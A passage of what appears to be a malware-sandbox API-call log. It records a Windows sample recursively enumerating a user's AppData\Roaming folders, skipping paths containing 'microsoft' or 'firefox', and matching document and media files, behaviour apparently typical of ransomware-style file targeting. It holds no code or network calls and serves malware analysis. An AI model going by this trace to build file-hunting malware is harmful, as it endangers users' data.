(lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="microsoft") returned 0x0 [0083.395] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="firefox") returned 0x0 [0083.396] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.396] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.396] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.396] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.396] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.396] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 1 [0083.396] GetNamedSecurityInfoW () returned 0x0 [0083.396] LocalFree (hMem=0x572028) returned 0x0 [0083.396] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="microsoft") returned 0x0 [0083.396] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="firefox") returned 0x0 [0083.396] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.396] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.396] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.396] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.396] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.396] Sleep (dwMilliseconds=0x0) [0083.396] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.396] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.396] Sleep (dwMilliseconds=0x0) [0083.396] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.396] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.396] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.396] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.396] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.396] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned 0 [0083.397] GetNamedSecurityInfoW () returned 0x0 [0083.397] LocalFree (hMem=0x571fe8) returned 0x0 [0083.397] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="microsoft") returned 0x0 [0083.397] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="firefox") returned 0x0 [0083.397] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.397] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.397] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.397] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.397] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.397] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 0 [0083.397] GetNamedSecurityInfoW () returned 0x0 [0083.397] LocalFree (hMem=0x572028) returned 0x0 [0083.397] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.397] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="firefox") returned 0x0 [0083.397] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.397] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.397] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.397] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.397] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.397] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 0 [0083.398] GetNamedSecurityInfoW () returned 0x0 [0083.398] LocalFree (hMem=0x571fe8) returned 0x0 [0083.398] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="microsoft") returned 0x0 [0083.398] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="firefox") returned 0x0 [0083.398] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.398] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.398] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.398] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.398] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.398] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 0 [0083.398] GetNamedSecurityInfoW () returned 0x0 [0083.398] LocalFree (hMem=0x572028) returned 0x0 [0083.398] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="microsoft") returned 0x0 [0083.398] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="firefox") returned 0x0 [0083.398] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.398] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.398] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.398] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.398] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.398] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 0 [0083.399] GetNamedSecurityInfoW () returned 0x0 [0083.399] LocalFree (hMem=0x571fe8) returned 0x0 [0083.399] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="microsoft") returned 0x0 [0083.399] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="firefox") returned 0x0 [0083.399] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.399] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.399] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.399] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.399] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 0 [0083.399] GetNamedSecurityInfoW () returned 0x0 [0083.399] LocalFree (hMem=0x572028) returned 0x0 [0083.399] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="microsoft") returned 0x0 [0083.399] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="firefox") returned 0x0 [0083.399] PathCombineW (in: pszDest=0x18c7c8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.399] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0x586ca0 [0083.399] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0 [0083.399] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.400] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.400] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.400] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.400] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.400] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.400] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.400] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned 0 [0083.400] GetNamedSecurityInfoW () returned 0x0 [0083.400] LocalFree (hMem=0x571fe8) returned 0x0 [0083.400] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0083.400] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0083.400] Sleep (dwMilliseconds=0x0) [0083.400] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.400] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.400] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.401] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned 0 [0083.401] GetNamedSecurityInfoW () returned 0x0 [0083.401] LocalFree (hMem=0x572028) returned 0x0 [0083.401] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="microsoft") returned 0x0 [0083.401] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="firefox") returned 0x0 [0083.401] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.401] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.401] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.401] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.401] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.401] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned 1 [0083.401] GetNamedSecurityInfoW () returned 0x0 [0083.401] LocalFree (hMem=0x571fe8) returned 0x0 [0083.401] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="microsoft") returned 0x0 [0083.401] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="firefox") returned 0x0 [0083.401] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.401] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.401] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.401] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.401] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.402] Sleep (dwMilliseconds=0x0) [0083.402] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.402] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.402] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 0 [0083.402] GetNamedSecurityInfoW () returned 0x0 [0083.402] LocalFree (hMem=0x572028) returned 0x0 [0083.402] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="microsoft") returned 0x0 [0083.402] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="firefox") returned="Firefox" [0083.402] Sleep (dwMilliseconds=0x0) [0083.402] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.402] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.402] Sleep (dwMilliseconds=0x0) [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.402] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Skype" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype" [0083.402] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned 0 [0083.402] GetNamedSecurityInfoW () returned 0x0 [0083.402] LocalFree (hMem=0x571fe8) returned 0x0 [0083.402] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="microsoft") returned 0x0 [0083.402] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="firefox") returned 0x0 [0083.403] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*" [0083.403] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.403] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.403] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="RootTools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools" [0083.403] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned 0 [0083.403] GetNamedSecurityInfoW () returned 0x0 [0083.403] LocalFree (hMem=0x572028) returned 0x0 [0083.403] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="microsoft") returned 0x0 [0083.403] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="firefox") returned 0x0 [0083.403] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*" [0083.403] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.403] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.403] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.403] Sleep (dwMilliseconds=0x0) [0083.403] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.403] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.403] Sleep (dwMilliseconds=0x0) [0083.403] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.403] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0 [0083.403] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.403] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.403] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 0x586b20 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.pptx", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW (pszFile="83D2u8nDKooEEZ.avi", pszSpec="*") returned 1 [0083.404] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.404] PathMatchSpecW 